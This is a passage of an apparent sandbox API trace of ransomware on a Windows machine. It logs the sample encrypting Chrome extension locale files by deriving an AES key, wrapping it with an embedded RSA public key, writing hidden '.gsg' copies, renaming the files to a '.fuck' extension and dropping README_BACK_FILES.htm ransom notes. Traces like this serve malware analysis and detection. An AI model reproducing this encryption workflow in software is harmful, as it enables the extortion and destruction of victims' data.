Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.673] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.675] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.675] lstrlenA (lpString="nyVZwrEPeJcSGZnLzNUpNIeDzMlQm") returned 29 [0263.675] CryptHashData (hHash=0x2e7fc40, pbData=0x28cb508, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.675] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fc40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7da00) returned 1 [0263.675] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0263.675] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9bc60, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c | out: pvStructInfo=0x2b9bc34, pcbStructInfo=0x2b9bc3c) returned 1 [0263.675] CryptAcquireContextA (in: phProv=0x2b9bc50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9bc50*=0x2e74ab0) returned 1 [0263.676] CryptImportPublicKeyInfo (in: hCryptProv=0x2e74ab0, dwCertEncodingType=0x1, pInfo=0x2eaf980*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2eaf9b0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2eaf9b8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9bc48 | out: phKey=0x2b9bc48*=0x2e7e240) returned 1 [0263.676] CryptEncrypt (in: hKey=0x2e7e240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9bc38*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9bc38*=0x80) returned 1 [0263.676] CryptEncrypt (in: hKey=0x2e7e240, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e75660*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e75660*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.676] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e75660*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e75660*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.677] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.679] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.679] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.693] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.693] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.693] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.693] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.694] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.694] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.694] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.694] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.694] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.694] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.694] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.695] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.695] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.695] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.695] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.695] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.695] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.696] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.696] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.696] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.696] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x33c, lpOverlapped=0x0) returned 1 [0263.696] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x33c, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x340) returned 1 [0263.696] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x340, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x340, lpOverlapped=0x0) returned 1 [0263.696] CloseHandle (hObject=0x5d5c) returned 1 [0263.696] CloseHandle (hObject=0x5d60) returned 1 [0263.697] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), bFailIfExists=0) returned 1 [0263.704] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json", dwFileAttributes=0x0) returned 1 [0263.705] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.gsg")) returned 1 [0263.706] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.fuck")) returned 1 [0263.707] CryptDestroyHash (hHash=0x2e7fc40) returned 1 [0263.707] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.707] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.707] FindNextFileA (in: hFindFile=0x2e7fd40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.707] FindClose (in: hFindFile=0x2e7fd40 | out: hFindFile=0x2e7fd40) returned 1 [0263.707] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\readme_back_files.htm")) returned 0xffffffff [0263.708] AreFileApisANSI () returned 1 [0263.708] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.708] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.708] GetFileType (hFile=0x5d64) returned 0x1 [0263.709] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.709] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.709] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.710] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.710] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.710] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.710] GetLastError () returned 0x0 [0263.710] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json")) returned 0x20 [0263.710] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json", dwFileAttributes=0x80) returned 1 [0263.710] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.711] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d5c [0263.712] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.gsg", dwFileAttributes=0x2) returned 1 [0263.713] CryptAcquireContextA (in: phProv=0x2b9bc54, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9bc54*=0x2e7a500) returned 1 [0263.714] CryptCreateHash (in: hProv=0x2e7a500, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9bc58 | out: phHash=0x2b9bc58) returned 1 [0263.714] lstrlenA (lpString="hdyBJCVtAqmxyhbnkFvIscGGzMlQm") returned 29 [0263.714] CryptHashData (hHash=0x2e7fd40, pbData=0x28cb4b8, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0263.714] CryptDeriveKey (in: hProv=0x2e7a500, Algid=0x6610, hBaseData=0x2e7fd40, dwFlags=0x1000000, phKey=0x2b9bc44 | out: phKey=0x2b9bc44*=0x2e7de00) returned 1 [0263.715] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----o", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9bc60, pcbBinary=0x2b9bc40, 